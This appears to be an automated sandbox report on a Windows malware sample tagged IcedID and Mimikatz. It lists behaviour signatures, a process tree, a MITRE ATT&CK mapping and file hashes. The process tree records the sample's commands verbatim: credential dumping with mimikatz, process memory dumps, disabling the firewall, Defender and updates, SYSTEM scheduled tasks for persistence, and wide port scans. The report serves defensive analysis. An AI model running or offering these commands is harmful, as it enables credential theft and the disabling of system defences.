Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
07/05/2024, 05:27
General
-
Target
2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
-
Size
7.8MB
-
MD5
59cd884d3b145f770bf5c689fd90025f
-
SHA1
1334c015b3dfedc9dac1a4d5020f9314476f5f39
-
SHA256
6ea8970a7fc929a9d258c028258a3aaadc121f4588f053cbc5a380ca91b67124
-
SHA512
f98384f5fc9bedaf59b066c5bc8768257587b7201818cc0a16ebb5f2f884a96ae0eda13894d06e7041528b2180b96b22a43328e80d4c24f468dec3d8f47d46b3
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (18328) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 38 IoCs
-
XMRig Miner payload 9 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ttltnyvty\ibyaef.exe"C:\Windows\TEMP\ttltnyvty\ibyaef.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jetgmbly\guwlsyl.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\jetgmbly\guwlsyl.exeC:\Windows\jetgmbly\guwlsyl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\jetgmbly\guwlsyl.exeC:\Windows\jetgmbly\guwlsyl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\lbtermtbs\etamgyklt\wpcap.exeC:\Windows\lbtermtbs\etamgyklt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt2⤵
-
C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exeC:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lbtermtbs\etamgyklt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lbtermtbs\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\lbtermtbs\Corporate\vfshost.exeC:\Windows\lbtermtbs\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tmessluuv" /ru system /tr "cmd /c C:\Windows\ime\guwlsyl.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lewlyngkg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yaubemieu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 784 C:\Windows\TEMP\lbtermtbs\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 388 C:\Windows\TEMP\lbtermtbs\388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 1736 C:\Windows\TEMP\lbtermtbs\1736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2560 C:\Windows\TEMP\lbtermtbs\2560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2808 C:\Windows\TEMP\lbtermtbs\2808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2952 C:\Windows\TEMP\lbtermtbs\2952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3048 C:\Windows\TEMP\lbtermtbs\3048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3756 C:\Windows\TEMP\lbtermtbs\3756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3880 C:\Windows\TEMP\lbtermtbs\3880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3972 C:\Windows\TEMP\lbtermtbs\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4056 C:\Windows\TEMP\lbtermtbs\4056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\lbtermtbs\etamgyklt\scan.bat2⤵
-
C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exeitfnybsmt.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2164 C:\Windows\TEMP\lbtermtbs\2164.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3216 C:\Windows\TEMP\lbtermtbs\3216.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2272 C:\Windows\TEMP\lbtermtbs\2272.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 3848 C:\Windows\TEMP\lbtermtbs\3848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 348 C:\Windows\TEMP\lbtermtbs\348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 4724 C:\Windows\TEMP\lbtermtbs\4724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\lbtermtbs\ntaiaautl.exeC:\Windows\TEMP\lbtermtbs\ntaiaautl.exe -accepteula -mp 2860 C:\Windows\TEMP\lbtermtbs\2860.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:81⤵
-
C:\Windows\SysWOW64\tyxtye.exeC:\Windows\SysWOW64\tyxtye.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe1⤵
-
C:\Windows\ime\guwlsyl.exeC:\Windows\ime\guwlsyl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe1⤵
-
C:\Windows\ime\guwlsyl.exeC:\Windows\ime\guwlsyl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD54abe190306c2d63cf83c0b4599b23dd2
SHA163e73492b638caf8ec2d37717c801608bab98667
SHA256d4e795706086447a624d8e07d5cbb9be6339661c4dc022c1f1edda9da82307b4
SHA5120e69b600585e9c468d7a49a325aa4421d51bd24913c862398943055d3e1a0ae22178d8dfff366972de81865960ff5ba4a8803b5d6ab122f4b03b3f30e0c0aeeb
-
Filesize
26.5MB
MD5fcafe6c6e0934bcf35314e6389f068e1
SHA1968a8b2d1cacdc93670fc0cdfd622ccf085b23d6
SHA2569adc2a236b75e2a2e364b67c12448de60ff09a5aa1706dc2f0cfced6a785c227
SHA512c1616e90ee7b0bce266bb4c702ca74436a1be06114dd089c0e2c26b240f5efb4197a0ed1d8b91b5c382c82f9e0fd9dcb845ddb9759e3d6d9a4871a6bb1667ed4
-
Filesize
7.7MB
MD52ade88a82f3e8672f1451218f332bc3f
SHA1b3c3197d3745007ee1d10625bd1ec0ae0f794e37
SHA256de2271387408b0a7406b25a20c894295e0c03ed5fc38513b4b34f2f316710513
SHA5128e07f9d460c4a23bd29f13d28754b75a9d531729e2a1148397bf97a19def747f8ad96bfd52e457fcc3d50555efd9dac4223de1a6279aea01f9ab857f1375d298
-
Filesize
3.5MB
MD5b65faef03ea0dbfe9a8783118ec591f9
SHA18ebad6e7b02c833296051a08e81f74a38c9252c6
SHA2569560fb3eea0f81d03db3dc015956f86497b323fac5200858043f7e0cc07f9c01
SHA512ee07ebb1f5b00dc98c09318ac5889fb9964396debb3178df0d56e55634c9686ceaee8cf10d1fa674811e63c5b146cf046180954725515b4b5dcd63c5c944d292
-
Filesize
2.9MB
MD57d194fc66d741eafd7d25a7291756fc7
SHA1584ab88374be2b81a3789664b43d65dd380bf826
SHA25604d79b641379928662754764267421c5ec6f5afe1bd6e725c2b89d19fa1f4d53
SHA512df361f3ee9348d93a9142980dad722f35daed8e58426dea2d77e4e4f9fabd04141997a52b444462ee004319a7aa4398924a9310c8adf8f84813ddcf8b71354f6
-
Filesize
810KB
MD52e88ba5ada12d991ca3d4f6d3b7ece70
SHA16ae17b6ba8a2fbc78dd6edf55f15cee87d0656bc
SHA25625b11c72d998ac56948684c70f7711136b668f8fb14b8ba2f98b2fbb1f3b214f
SHA512b7eaa84d7e4de0798918f739652e6824390946a97ebe94080082c2a50924a6745f83be45b9f23f226c065696244588d5983de85c9bd96c37e7ed689b83504c14
-
Filesize
2.1MB
MD512c881f3f000577cab56b6c77e9b040a
SHA1ae0a8329037c508830a54f77175dc20f5c3d3a1b
SHA2564ece0b5265982b1b67703f7284187dc3d4658e5251db8b6f6de5e08f4d9e63aa
SHA512fd2d2d53e3dc5d0737420fc480e4e0caf78ec90e655da7ffd40884fc991234129cd0a8f1f88db8a3b9e345154c087a18ea40ffdf1e3617178b7dbc95746e586f
-
Filesize
33.7MB
MD5a6b4bed9c55f56245cb77b5bd7c07998
SHA175b6c98e1af72a46b017215ebf5ac23240b47386
SHA2566c12e9d6105ae484167b111761c87aec850916bd4b1a6b79e04be2b5a610351f
SHA512af1531f03e6301fbade25ca7f1592ae8e172ac5823de8502c2234af22835528e92631ae7579dae363d9c09585b195cf5f7dcdbbd39d9cde045729ae84b6a300c
-
Filesize
20.8MB
MD5792d6897b96a118fc8f623ea91cc33cc
SHA1cc97098f72623054d9dce40958a9cf17187b5e3b
SHA25624b957189c3f8c033e2cfdd3063edce697f866fc3a193d2fa9e6e4f4741df441
SHA5128031f7382552612fa9de7d637c12013c14c89a2634632a7ba953555ce776f8f254744a716bbc4092547824805d0f3ab433b8a20ee8775d79b5637bb87a33abb9
-
Filesize
4.2MB
MD50b29e7400b0af97e768462e7218f502f
SHA1df09630dafc727ede4ccd1436eba4f8996a18980
SHA256141b2ec730a2432e1996a9142d42f92990a622592a137b43d1d0139179f6aedc
SHA512c4f479b8544fef27a1ae9002d5dbcc27736a36c5f5c03685393f9a5639ad3878d760c9329762f7a8358ec5555db15bdfd68aab5052b03d806d0f63d79a54a48f
-
Filesize
44.2MB
MD59aaa0de99eedff2d79b9e10634b672fe
SHA100852560fb94bc0c00c7c44a1445748f6b983707
SHA256ebc6ea12050a714ac33d0098c7a86539ea4ede682518ac1d0cab71c5441eb02b
SHA5128f2f3bb9f440f6a8bc9728f31189a457575f4707955d5519cb55d3a9abe1aa1bb89e4c67bde7c776a45877a61f171fbeb550b547fff6cd641f167f6ec83c1839
-
Filesize
2.0MB
MD5d97ed8336797867c5af694e8d4b02cfe
SHA1c262498a74a0d9440b35cf96aa66e64403018e4b
SHA256a02e76b642b70a738d7fdacbe767aa22816c8ac96ef40aadabe83e14264538a4
